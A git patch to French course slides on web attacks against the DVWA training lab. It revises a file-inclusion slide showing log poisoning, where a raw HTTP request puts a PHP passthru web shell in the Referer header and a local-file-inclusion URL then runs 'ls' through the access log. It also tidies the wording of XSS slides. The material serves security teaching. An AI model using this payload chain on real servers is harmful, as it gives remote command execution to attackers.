From a20d62e03cf61738df7c91bb2d39c54fb4edef04 Mon Sep 17 00:00:00 2001 From: Vincent Mazenod <vmazenod@gmail.com> Date: Mon, 19 Oct 2020 18:53:57 +0200 Subject: [PATCH] fix cours --- content/slides/1337/md/fi.md | 12 ++++-------- content/slides/1337/md/xss.md | 11 ++++++----- 2 files changed, 10 insertions(+), 13 deletions(-) diff --git a/content/slides/1337/md/fi.md b/content/slides/1337/md/fi.md index 07280f2..b79ca8f 100644 --- a/content/slides/1337/md/fi.md +++ b/content/slides/1337/md/fi.md @@ -178,9 +178,7 @@ CustomLog /home/mazenovi/logs/dvwa-access.log combined * l'utilisateur lié au thread apache a accès en lecture à ce répertoire -<small> -[http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log](http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.lo) -</small> +[http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log](http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log) * les logs sont affichés @@ -201,15 +199,13 @@ $ nc dv.wa 80 * Entrer manuellement les paramètres suivant ```http -GET /<?php echo passthru($_GET['cmd']); ?> HTTP/1.1 +GET / HTTP/1.1 Host: dv.wa -Referer: <?php echo passthru($_GET['cmd2']); ?> -User-Agent: <?php echo passthru($_GET['cmd3']); ?> +Referer: <?php echo passthru($_GET['cmd']); ?> +User-Agent: 1337-webbrowser ``` -<small> [http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log&cmd=ls](http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log&cmd=ls) -</small> attendre le log rotate en cas d'échec diff --git a/content/slides/1337/md/xss.md b/content/slides/1337/md/xss.md index 9465cf1..86dfe54 100644 --- a/content/slides/1337/md/xss.md +++ b/content/slides/1337/md/xss.md @@ -8,7 +8,8 @@ * Affichage de données utilisateur sans validation ou échappement * par oubli du développeur * par les messages d'erreurs renvoyés par le langage - * tentative d'injection de code interprétable par le navigateur de la cible + +* tentative d'injection de code interprétable par le navigateur de la cible ### <i class="fa fa-user-secret"></i> Que peut on faire? @@ -67,11 +68,11 @@ Note:    -3.Bob envoie l'url du XSS à Alice en l'incitant à cliquer sur un lien forgé **XSS réfléchie** +3.Bob envoie l'url du XSS à Alice en l'incitant à cliquer sur un lien forgé (**XSS réfléchie**) ou -3.attend simplement qu'elle se connecte une page compromise **XSS stockée** +3.attend simplement qu'elle se connecte à une page compromise (**XSS stockée**) Note: - test du XSS souvent alert ... méthode plus discrète notamment pour XSS stored @@ -82,11 +83,11 @@ Note:     -4.Alice clique sur le lien forgé **XSS réfléchie** +4.Alice clique sur le lien forgé (**XSS réfléchie**) ou -4.Alice consulte la page compromise et pense avoir à faire à l'originale **XSS stockée** +4.Alice consulte la page compromise et pense avoir à faire à l'originale (**XSS stockée**) ## XSS -- GitLab